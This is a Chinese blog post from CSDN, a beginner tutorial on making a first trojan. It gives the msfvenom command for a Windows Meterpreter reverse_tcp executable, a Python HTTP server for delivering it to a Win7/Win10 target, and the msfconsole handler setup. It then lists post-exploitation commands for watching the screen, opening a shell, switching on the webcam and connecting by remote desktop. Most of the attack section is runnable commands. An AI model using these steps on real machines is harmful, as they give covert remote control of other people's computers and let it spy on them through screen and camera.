【网络安全】你的第一个木马

最新推荐文章于 2024-10-02 15:25:16 发布
最新推荐文章于 2024-10-02 15:25:16 发布
阅读量78 收藏
点赞数
分类专栏: 网络安全 文章标签: web安全 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681307/article/details/131082521
版权
该文指导读者如何在KaliLinux环境下利用msfvenom生成Windows木马,通过Python服务器将木马传输至Win7/Win10系统,然后使用msfconsole进行监听和控制,包括监控屏幕、摄像头操作及远程桌面连接。请注意,这些行为涉及网络安全和隐私,应遵守合法使用条款。
摘要由CSDN通过智能技术生成

这里我直接讲到了如何制作自己的第一个木马程序,但是这之前需要有一些准备。

  1. 安装虚拟机
  2. 虚拟机中安装kali系统
  3. 一个目标主机,win7或者win10等系统(关闭防护墙)

以下命令在kali命令行中输入

制作一个木马:

image-20230607103446283

msfvenom  -p  windows/meterpreter/reverse_tcp  LHOST=(kali ip )  LPORT=4444  -f  exe  >muma.exe
  • 生成的木马在Linux的root目录中
  • 注意:需要管理员身份
如何把木马拷贝到win7上
  • python3 -m http.server 80 (在Linux开启服务)
  • 在目标主机运行此网站
  • 在win浏览器上输入目标主机ip地址(如果打不开网站就把Linux中root下index删除)
  • 在列表里面下载木马就可以
如何运行木马
  • msfconsole
  • show options 查看设置
  • use exploit/multi/handler 选择后门模块
  • set payload windows/meterpreter/reverse_tcp选择共计载荷
  • set LHOST (kali ip) 设置监听ip
  • set LPORT 4444设置端口(默认通常就是4444)
  • run 运行
木马操作
  • run vnc监控屏幕
  • shell 进入win7的shell,可以进入目录,新建文件夹等一系列操作
  • 输入:webcam_list(检查有无摄像头,有多少个)
  • 输入:webcam_stream (开启摄像头)
远程桌面
  • mstsc (目标电脑需要开启远程桌面功能)
  • 虚拟机快照关机拍摄,开机拍摄快照占用空间太大
dumplings。
关注
专栏目录
头歌-信息安全-木马攻击与防御
哩吇的博客
11-27 1363
学习信息安全
msf渗透练习-生成木马控制window系统
weixin_49349476的博客
06-12 4613
利用kali的msf工具生成木马window木马,对目标window主机进行控制,本次练习仅用于学习,不要用于非法用途(做个好白帽)
linux木马程序病原体的制作和运行
weixin_40501323的博客
12-27 4813
1.木马的制作: 首先我们可以在/usr/bin/目录下创建一个源程序muma,输入 你所需要指定的代码,这里为了做实验就随便写了个,你也可以换上一些挖矿程序,ddos攻击代码,为了知道木马是否运行,我们可以加入一条指令echo 'date' >> /tmp/date.txt,这样如果木马程序运行,我们就可以在tmp/date.txt下看到内容date。sleep 1 是指这段代码多长时间执行一
c语言面试题每日一练
weixin_42224577的博客
11-19 4万+
目录 1.Linux中的常用命令 2 1.在/tmp/目录下创建test.txt文件,内容为: Hello,World! ,用一个命令写出来。 2 2.给test.txt文件除所有者之外增加执行权限,最终以数字写出文件的权限。 2 3.查找linux系统下以config结尾,并备份到/data/backup/目录下 2 4.创建 test.txt所属的用户为root,组为abc,请将test.txt使拥有者为abc,组为root,写出命令。 2 5.如何查看文件内容,命令有哪些?查看文件第1行到3行,查看文
木马程序的制作
自学编程_youkewang.top
03-08 3万+
0x0:想必大家都听说过计算机病毒或者木马吧,看着电影里面的黑客敲几下键盘就能控制你的系统,窃取你的隐私资料,执行任意命令,很炫酷吧,其实这种技术不难实现,接下来我就带领大家来玩一玩木马的制作. 实验环境:一台Win7SP1和一台WinXPsp3+Backtrack5. 使用工具有:msfpayload+msfencode.   0x01:使用msfpayload windows/mete
计算机网络-网络安全(病毒和木马
resilient的博客
02-21 3270
篡改首页 更改系统设置 更改应用程序 删除文件。 病毒 熊猫烧香--ghost软件 把系统备份也给删除了。 计算机蠕虫病毒 消耗计算机内存 cpu。 木马程序 盗号木马、qq被盗 。每天copy某些目录到固定的FTP服务器。需要把信息 数据发出去。 逻辑炸弹 按时间触发。 杀毒软件如何识别病毒的?? 360直接把病毒放到隔离区了。 有些病毒放在计算机中不加密码的话,360那些杀毒软件可以马上杀掉。 灰鸽子 装上就自动删除了 控制端可以捕获中招的计算机的屏幕 ...
一文带你了解网络安全简史
聚集机器学习、信息安全
12-01 5342
本文介绍了网络安全的发展简史,从最早的计算机病毒到目前的高级威胁时代。
网络安全技术新手入门:利用Kali Linux生成简单的远程控制木马
weixin_56154577的博客
01-08 5912
本文对木马的生成过程讲的比较详细,适合对网络安全技术感兴趣的小伙伴们,读完本文之后,读者可以对木马的形成、传播、对靶机的控制流程有一个逻辑性的理解
自学网络安全的三个必经阶段(含路线图)
热门推荐
kali_Ma的博客
10-26 4万+
根据腾讯安全发布的《互联网安全报告》,目前中国网络安全人才供应严重匮乏,每年高校安全专业培养人才仅有3万余人,而网络安全岗位缺口已达70万,缺口高达95%。而且,我们到招聘网站上,搜索【网络安全】【Web安全工程师】【渗透测试】等职位名称,可以看到安全岗位薪酬待遇好,随着工龄和薪酬增长,呈现「越老越吃香」的情况。
网络安全威胁——木马
2201_75362610的博客
03-23 1179
木马一名来源于古希腊特洛伊战争中著名的“木马计”,指可以非法控制计算机,或在他人计算机中从事秘密活动的恶意软件。木马通过伪装成正常软件被下载到用户主机,随后黑客通过木马控制用户主机并盗取用户信息。由于计算机中了木马后不会表现出异常,所以往往很难发现,具有很强的隐蔽性。木马与病毒的区别木马和病毒一般统称恶意程序或恶意软件。木马更倾向于默默窃取,病毒则具有一定显性破坏性。前者像暗中行动的小偷,后者像打砸抢烧的强盗。
第28节 复习实验+利用445植入木马一(大飞哥网络安全初学者课程).mp4
07-18
大飞哥网络安全第一阶段课程,适合0基础/初学者体系化学习,也适合老手巩固基础观看,希望大家在学习过程中理解技术原理,为更深层次的防御攻击等学习打好基础。最好别用mac,好多工具不兼容。
第29节 利用445植入木马二(大飞哥网络安全初学者课程).mp4
07-18
大飞哥网络安全第一阶段课程,适合0基础/初学者体系化学习,也适合老手巩固基础观看,希望大家在学习过程中理解技术原理,为更深层次的防御攻击等学习打好基础。最好别用mac,好多工具不兼容。
密码学和网络安全原理与实践,第七版William Stallings
04-01
《密码学与网络安全:原理与实践》是William Stallings撰写的一本经典教材,第七版更是对当前网络安全领域的理论与实践进行了全面更新。本书是深入理解网络加密与安全的基础读物,对于从事信息安全、计算机科学或者...
河南省第一届职业技能大赛网络安全赛项试题-B模块 -2.docx
03-02
本资源是河南省第一届职业技能大赛网络安全赛项试题-B模块,涵盖了多个网络安全相关的知识点,包括操作系统渗透测试、中间件渗透测试、Web 安全应用、数据分析取证与图片隐写等。 1. Linux 操作系统渗透测试 ...
第四个月第一周周四扫描木马.ppt
05-30
第四个月第一周周四扫描木马
网络安全】Cookie与ID未强绑定导致账户接管
最新发布
等风来
10-02 144
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-27 772
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
信息技术网络安全政策制定
网络研究观
09-27 1039
网络安全政策的真正必要性很简单:网络安全并不像锁门或不偷公司笔那么简单。在许多情况下,网络安全问题并非来自恶意,而是来自无知。
组策略教程:网络安全木马防御与登录设置
本资源是一份关于"修改组策略-网络攻防"的课程讲义,主要关注于网络安全木马攻击与防御技术。课程内容首先介绍了如何通过组策略管理器来调整系统设置,如在用户登录时执行特定程序,这对于网络管理员来说是维护...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值